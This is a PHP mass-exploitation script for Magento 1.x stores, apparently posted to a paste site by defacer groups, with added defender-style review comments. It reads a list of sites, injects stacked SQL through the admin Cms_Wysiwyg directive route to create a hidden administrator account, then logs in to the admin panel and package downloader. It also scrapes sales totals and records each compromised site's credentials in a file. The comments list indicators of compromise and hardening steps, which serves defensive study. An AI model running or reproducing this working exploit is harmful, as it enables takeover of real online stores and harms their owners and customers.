antonkill666

magento

Oct 5th, 2016
  1. <?php
      // Review note: error output is disabled and the execution time limit is removed by the
      // next two calls, so the script can run unattended over a whole host list.
  2. error_reporting(0);
  3. set_time_limit(0);
  4. /*
  5. ----------------------
  6. Name : Auto Exploiter Magento
  7. Date : 27/02/2016
  8. Thank's : Ja , Kevin a.k.a Mr.K , ANGK3RS T3AM
  9. ----------------------
  10. IndoXploit Coder's | Bug7sec Team | Defacer Tersakiti Team
  11. ----------------------
  12. Tuban Cyber Team
  13. ----------------------
  14. */
  15.  
      // Review note (defender): these hard-coded values are what ck_admin() writes into a store's
      // admin_user table, so they serve as indicators of compromise: username "shortcut" and an
      // e-mail of the form shor7cut-<unix timestamp>@gmail.com. The timestamp is taken once per
      // run, so every host hit in the same run receives the same address.
      // Other copies of this script may carry different values; absence of these exact strings
      // does not show that a store is clean.
  16. $username = "shortcut";
  17. $password = "bug7sec";
  18. $email = "shor7cut-".time()."@gmail.com";
  19.  
  20. function ck_admin($site,$username,$password,$email){
      // Sends a single unauthenticated POST to "$site/admin/Cms_Wysiwyg/directive/index/" and
      // returns true when the response body contains a form_key hidden input, false otherwise.
      //   $site     - base URL of the store, taken from the caller's host list
      //   $username - login name placed in the inserted admin_user row
      //   $password - password hashed inside the SQL as MD5(salt . password) . ':' . salt
      //   $email    - e-mail address placed in the inserted admin_user row
      //
      // Review note (defender): the "filter" field is the base64 of a string that closes the
      // expected popularity[field_expr] expression and appends stacked SQL statements. Those
      // statements insert one row into admin_user and one into admin_role. Artefacts a
      // responder can search for, all visible in the string below:
      //   - admin_user.firstname = 'Firstname', lastname = 'Lastname', is_active = 1, lognum = 0
      //   - admin_user.password ending in ":rp" (fixed salt 'rp', unsalted-iteration MD5)
      //   - admin_user.extra copied from MAX(extra) of the existing admin rows
      //   - admin_role row with role_type 'U', parent_id 1, role_name 'Firstname'
      // Request-side indicators: POST to /admin/Cms_Wysiwyg/directive/index/ carrying the
      // ___directive, filter and forwarded fields, with the spoofed msnbot User-Agent set below.
      // This looks like the publicly documented pre-authentication SQL injection in Magento 1.x;
      // confirm against the vendor advisory and make sure the corresponding security patch is
      // applied. Auditing admin_user / admin_role for rows the store owner did not create and
      // restricting access to the admin route are the matching clean-up and hardening steps.
  21. $a="popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '".$password."') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','".$email."','".$username."',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '".$username."'),'Firstname');";
  22.  
  23. $bs=base64_encode($a);
  24. $post=array(
  25. "___directive" => "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
  26. "filter" => $bs,
  27. "forwarded" => 1
  28. );
  29. echo "|_[ Check admin ... ";
  30. $ch = curl_init();
  31. curl_setopt($ch, CURLOPT_URL, "$site/admin/Cms_Wysiwyg/directive/index/");
  32. curl_setopt($ch, CURLOPT_HEADER, false);
      // The User-Agent imitates a search-engine crawler; the source address will not belong to
      // that crawler's network, which is a cheap check when reviewing access logs.
  33. curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  34. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  35. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      // Certificate and host-name verification are both switched off for this request.
  36. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  37. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  38. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  39. curl_setopt($ch, CURLOPT_TIMEOUT, 30);
      // Cookies are read from and written to cookie.txt in the current working directory.
  40. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  41. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  42. curl_setopt($ch, CURLOPT_VERBOSE, false);
  43. curl_setopt($ch, CURLOPT_POST, true);
  44. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  45. $data = curl_exec($ch);
      // The status code is fetched but not used afterwards in this function.
  46. $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  47. curl_close($ch);
      // The only success test is the presence of a form_key hidden input in the response body.
  48. $re = "/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\" \\/>/";
  49. preg_match($re, $data, $matches);
  50. if($matches[1]){
  51. echo "w00t\r\n";
  52. return true;
  53. }
  54. echo "JM800t\r\n";
  55. echo "|\r\n";
  56. return false;
  57. }
  58.  
  59. function ck_pass($site,$email){
      // POSTs "email=<$email>" to the admin forgot-password route and returns true when the
      // response body contains the string "success-msg", false otherwise.
      //   $site  - base URL of the store
      //   $email - the address used for the admin_user row in ck_admin()
      //
      // Review note (defender): a forgot-password POST to the admin route that directly follows
      // a POST to the Cms_Wysiwyg directive route, from the same client and with the same
      // User-Agent, is a useful correlation for log review. If the store's mail log is kept, a
      // reset mail addressed to an unfamiliar external mailbox is a second trace of this step.
  60. echo "|_[ Check forgotpass ... ";
  61. $ch = curl_init();
  62. curl_setopt($ch, CURLOPT_URL, "$site/index.php/admin/index/forgotpassword/");
  63. curl_setopt($ch, CURLOPT_HEADER, false);
  64. curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  65. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  66. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      // Certificate and host-name verification are both switched off for this request.
  67. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  68. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  69. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  70. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  71. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  72. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  73. curl_setopt($ch, CURLOPT_VERBOSE, false);
  74. curl_setopt($ch, CURLOPT_POST, true);
  75. curl_setopt($ch, CURLOPT_POSTFIELDS, "email=".$email."");
  76. $data = curl_exec($ch);
      // The response is judged only by whether the markup contains "success-msg".
  77. $re = "/success-msg/";
  78. preg_match($re, $data, $matches);
  79. if($matches[0]){
  80. return true;
  81. echo "w00t\r\n";
  82. echo "|\r\n";
  83. }else{
  84. echo "JM800t\r\n";
  85. echo "|\r\n";
  86. return false;
  87. }
  88. echo "|\r\n";
  89. }
  90. function ck_price($data){
      // Pulls every <span class="price">...</span> element out of $data and returns one status
      // line built from the first two matches, labelled "Sales/Orders".
      //   $data - HTML of a page fetched by the caller (ck_login() passes its login response)
      //
      // Review note (defender): the script reads revenue figures straight after logging in,
      // presumably from the admin dashboard (the page layout is not shown here). That suggests
      // compromised stores are being ranked by turnover, which matters when judging follow-on risk.
  91. $re = "/<span class=\"price\">(.*?)<\\/span>/";
  92. preg_match_all($re, $data, $matches);
  93. $price = "|_[ Sales/Orders : ".$matches[0][0]."/".$matches[0][1]."\r\n";
  94. return $price;
  95. }
  96.  
  97. function save($name,$data){
      // Appends $data to the file $name (opened in "a+" mode) and closes it again.
      // Stops the whole script with "Unable to open file!" when the file cannot be opened.
      //   $name - path of the output file; ck_download() passes "magento.txt"
      //   $data - text to append
      //
      // Review note (defender): on a seized or recovered operator machine, the file written here
      // is the list of stores for which a login succeeded.
  98. $myfile = fopen($name, "a+") or die("Unable to open file!");
  99. fwrite($myfile, $data);
  100. fclose($myfile);
  101. }
  102.  
  103. function ck_login($site,$username,$password){
      // POSTs login[username] / login[password] to "$site/admin" and returns true when the
      // response contains a link-logout anchor whose text is exactly "Log Out"; otherwise false.
      // On success it also prints the line produced by ck_price() for the same response.
      //   $site     - base URL of the store
      //   $username - account name inserted earlier by ck_admin()
      //   $password - matching password
      //
      // Review note (defender): this is the first authenticated use of the injected account.
      // An admin login by a user created seconds earlier, with lognum starting at 0 and a
      // crawler User-Agent, is a strong signal in admin access and action logs.
  104. $ch = curl_init();
  105. curl_setopt($ch, CURLOPT_URL, "$site/admin");
  106. curl_setopt($ch, CURLOPT_HEADER, false);
  107. curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  108. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  109. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      // Certificate and host-name verification are both switched off for this request.
  110. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  111. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  112. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  113. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
      // Same cookie.txt as the earlier requests, so the session carries over between steps.
  114. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  115. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  116. curl_setopt($ch, CURLOPT_VERBOSE, false);
  117. curl_setopt($ch, CURLOPT_POST, true);
  118. curl_setopt($ch, CURLOPT_POSTFIELDS, "login[username]=".$username."&login[password]=".$password."");
  119. $data = curl_exec($ch);
      // Success is decided by the logout link text in the returned page.
  120. $re = "/class=\"link-logout\">(.*?)<\\/a>/";
  121. preg_match($re, $data, $matches);
  122. if($matches[1]=="Log Out"){
  123. echo "|_[ Login admin ... w00t\r\n";
  124. echo ck_price($data);
  125. return true;
  126. }else{
  127. echo "|_[ Login admin ... JM800t\r\n";
  128. return false;
  129. }
  130. }
  131. function ck_download($site,$username,$password){
      // POSTs the same credentials to "$site/downloader/index.php", inspects the returned page
      // and appends a record to magento.txt when the page contains "Log Out".
      // Returns false when the login marker is missing; the success path has no return statement.
      //   $site     - base URL of the store
      //   $username - account name inserted earlier by ck_admin()
      //   $password - matching password
      //
      // Review note (defender): /downloader is the package-management front end of Magento 1.x,
      // and an admin session there can install extensions, which makes it a code-deployment
      // path on the web server. The script also tests for the write-permission warning and for
      // the string "Grizzly_MassEmail", presumably to find stores that can send bulk mail.
      // Hardening that fits what is shown here: remove or IP-restrict /downloader, keep the
      // Magento tree read-only for the web user, and alert on any login to that path.
  132. $ch = curl_init();
  133. curl_setopt($ch, CURLOPT_URL, "$site/downloader/index.php");
  134. curl_setopt($ch, CURLOPT_HEADER, false);
  135. curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  136. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  137. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      // Certificate and host-name verification are both switched off for this request.
  138. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  139. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  140. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  141. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  142. curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  143. curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  144. curl_setopt($ch, CURLOPT_VERBOSE, false);
  145. curl_setopt($ch, CURLOPT_POST, true);
  146. curl_setopt($ch, CURLOPT_POSTFIELDS, "login[username]=".$username."&login[password]=".$password."");
  147. $data = curl_exec($ch);
  148. //echo $data;
  149. if(preg_match("/Log Out/",$data)){
  150. echo "|_[ Login downloader w00t\r\n";
  151. $login = true;
      // "Kesalahan permissions" is Indonesian for "permissions error"; it is printed when the
      // page shows the insufficient-write-permissions warning.
  152. if(preg_match("/Warning: Your Magento folder does not have sufficient write permissions./",$data)){
  153. echo "|_[ Kesalahan permissions\r\n";
  154. }else{
  155. if(eregi("Grizzly_MassEmail", $data)){
  156. echo "|_[ Package Smtp w00t\r\n";
  157. $smtp = true;
  158. }else{
  159. $smtp = false;
  160. echo "|_[ Package Smtp w00t\r\n";
  161. }
  162. }
      // The record written here holds the site URL together with the injected credentials in
      // clear text, tagged "[Login]" and, when $smtp is true, additionally "[Login+SMTP]".
  163. if($login){
  164. save("magento.txt","[Login] $site,$username,$password \r\n");
  165. if($smtp){
  166. save("magento.txt","[Login+SMTP] $site,$username,$password \r\n");
  167. }
  168. }
  169.  
  170. }else{
  171. echo "|_[ Login downloader .. JM800t\r\n";
  172. return false;
  173. }
  174. }
  175.  
  176.  
  177. if(isset($argv[1])){
      // Command-line driver: treats the first argument as the path of a text file, splits its
      // content on "\r\n" into site URLs and runs the four checks against each one in turn.
      // Does nothing when no argument is given or the file does not exist.
      //
      // Review note (defender): per host the request order is fixed - directive POST, admin
      // forgot-password POST, admin login POST, downloader login POST - with a fresh cookie jar
      // each time. That ordered four-request burst from one client is a behavioural signature
      // that can be matched in web-server logs even if the hard-coded strings were changed.
  178. if(file_exists($argv[1])){
  179. $shc_fgt = file_get_contents($argv[1]);
  180. $explodes = explode("\r\n", $shc_fgt);
  181. cover();
      // $no is the 1-based position in the list, $no_c the list length, $v the number of hosts
      // for which both ck_admin() and ck_pass() returned true.
  182. $no=1;
  183. $no_c = count($explodes);
  184. $v=0;
  185. foreach ($explodes as $site) {
      // The cookie file from the previous host is deleted before each new host.
  186. unlink(getcwd().'/cookie.txt');
  187. echo "|----[$no|$no_c|$v]----\r\n";
  188. echo "|-[ $site\r\n";
  189. if(ck_admin($site,$username,$password,$email)){
  190. if(ck_pass($site,$email)){
  191. echo "w00t\r\n";
  192. ck_login($site,$username,$password);
  193. ck_download($site,$username,$password);
  194. echo "|\r\n";
  195. $v++;
  196. }
  197. }
  198. $no++;
  199. }
  200. }
  201. }
  202.  
  203. function cover($site){
      // Prints the tool's start-up banner to standard output. The $site parameter is declared
      // but not read anywhere in the body.
      //
      // Review note (defender): the banner text and group names are attribution hints only;
      // they are trivially edited and should not be relied on to identify an operator.
  204. echo "|-------------------------------------------|\r\n";
  205. echo "| Exploit Magento |\r\n";
  206. echo "|-------------------------------------------|\r\n";
  207. echo "|SHOR7CUT | BUG7SEC | DEFACER TERSAKITI TEAM|\r\n";
  208. echo "|-------------------------------------------|\r\n";
  209. echo "|\r\n";
  210. }
  211.  
  212.  
  213. ?>